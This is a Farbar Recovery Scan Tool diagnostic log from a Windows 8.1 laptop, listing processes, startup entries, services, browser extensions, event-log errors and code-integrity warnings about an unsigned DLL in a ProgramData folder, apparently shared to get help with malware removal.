Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
 
==================== Loaded Modules (Whitelisted) ==============
 
2012-08-06 15:09 - 2012-08-06 15:09 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-08-06 15:08 - 2012-08-06 15:08 - 00103424 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2013-04-23 03:39 - 2012-06-07 23:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 14:34 - 2012-06-08 14:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 01405768 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libglesv2.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\WINDOWS\system32\Drivers\vfrrubmu.sys:changelist
AlternateDataStreams: C:\Users\Richie\OneDrive:ms-properties
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Richie\Pictures\first wallapaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (07/29/2015 08:49:07 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 9d8
 
Start Time: 01d0ca604967bcdd
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: c6007ae4-3654-11e5-8189-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 08:35:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_DiagTrack, version: 6.3.9600.17415, time stamp: 0x54504177
Faulting module name: ntdll.dll, version: 6.3.9600.17736, time stamp: 0x550f4336
Exception code: 0xc000000d
Fault offset: 0x0000000000101e60
Faulting process id: 0x68c
Faulting application start time: 0xsvchost.exe_DiagTrack0
Faulting application path: svchost.exe_DiagTrack1
Faulting module path: svchost.exe_DiagTrack2
Report Id: svchost.exe_DiagTrack3
Faulting package full name: svchost.exe_DiagTrack4
Faulting package-relative application ID: svchost.exe_DiagTrack5
 
Error: (07/29/2015 08:32:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingWeather_8wekyb3d8bbwe!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/29/2015 08:25:40 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1958
 
Start Time: 01d0ca5d2dd98708
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 7ae3f652-3651-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 07:55:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1824
 
Start Time: 01d0ca58fcf74e90
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 4a0a7cdf-364d-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 07:32:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingTravel_8wekyb3d8bbwe!AppexTravel failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/29/2015 07:25:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1d0c
 
Start Time: 01d0ca54cc12ec89
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 1920cd35-3649-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 06:55:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 828
 
Start Time: 01d0ca509b2a07db
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: e83cf547-3644-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 06:33:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingWeather_8wekyb3d8bbwe!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/29/2015 06:25:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 199c
 
Start Time: 01d0ca4c6a4613d0
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: b783ca19-3640-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
 
System errors:
=============
Error: (07/29/2015 08:35:27 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Diagnostics Tracking Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:52:59 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (07/29/2015 05:51:46 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: 
%%1056
 
Error: (07/29/2015 05:51:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Avira Service Host service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:16 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (07/29/2015 05:51:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The HP Support Assistant Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:15 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (07/29/2015 05:51:15 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:15 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:14 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMScheduler service terminated unexpectedly.  It has done this 1 time(s).
 
 
Microsoft Office:
=========================
Error: (07/29/2015 08:49:07 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.209119d801d0ca604967bcdd4294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exec6007ae4-3654-11e5-8189-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 08:35:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe_DiagTrack6.3.9600.1741554504177ntdll.dll6.3.9600.17736550f4336c000000d0000000000101e6068c01d0c970c4e8f0e5C:\WINDOWS\System32\svchost.exeC:\WINDOWS\SYSTEM32\ntdll.dlldf3e7ea0-3652-11e5-8188-2c59e5a5a8a3
 
Error: (07/29/2015 08:32:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Microsoft.BingWeather_8wekyb3d8bbwe!App-2144927148
 
Error: (07/29/2015 08:25:40 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911195801d0ca5d2dd987084294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe7ae3f652-3651-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 07:55:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911182401d0ca58fcf74e904294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe4a0a7cdf-364d-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 07:32:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Microsoft.BingTravel_8wekyb3d8bbwe!AppexTravel-2144927148
 
Error: (07/29/2015 07:25:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.209111d0c01d0ca54cc12ec894294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe1920cd35-3649-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 06:55:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.2091182801d0ca509b2a07db4294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exee83cf547-3644-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 06:33:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Microsoft.BingWeather_8wekyb3d8bbwe!App-2144927148
 
Error: (07/29/2015 06:25:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911199c01d0ca4c6a4613d04294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exeb783ca19-3640-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
 
CodeIntegrity:
===================================
  Date: 2015-07-29 20:41:09.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 16:18:41.402
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:30:30.306
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:21:42.300
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:44:43.259
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:35:12.748
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:15:16.739
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 20:46:48.220
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:37:12.957
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:29:33.384
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: AMD E-300 APU with Radeon™ HD Graphics
Percentage of memory in use: 35%
Total physical RAM: 3682.26 MB
Available physical RAM: 2372.15 MB
Total Virtual: 4450.26 MB
Available Virtual: 2562.53 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:273.49 GB) (Free:235.87 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive d: (RECOVERY) (Fixed) (Total:23.39 GB) (Free:2.82 GB) NTFS ==>[system with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 1E1F4777)
 
Partition: GPT Partition Type.
 
==================== End of log ============================
 
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:28-07-2015
Ran by Richie (administrator) on RICHIE (29-07-2015 20:46:24)
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\WinStore\WSHost.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17709_none_fa7932f59afc2e40\TiWorker.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3030256 2013-05-16] (Synaptics Incorporated)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-06-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [782008 2015-07-15] (Avira Operations GmbH & Co. KG)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{406A6EC4-A42A-4564-810E-0501F8EED96A}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D51C3955-2AF3-49BA-9C94-C3C07B602A4D}: [DhcpNameServer] 192.168.254.254
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll [2012-04-26] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-05-11] ()
 
Chrome: 
=======
CHR Profile: C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-27]
CHR Extension: (Google Docs) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-27]
CHR Extension: (Google Drive) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-27]
CHR Extension: (YouTube) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-27]
CHR Extension: (Google Search) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-27]
CHR Extension: (Google Sheets) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-27]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-27]
CHR Extension: (Gmail) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [887128 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1213072 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [217280 2015-06-02] (Avira Operations GmbH & Co. KG)
S3 BthHFSrv; C:\Windows\System32\BthHFSrv.dll [324608 2014-11-21] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2015-07-10] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
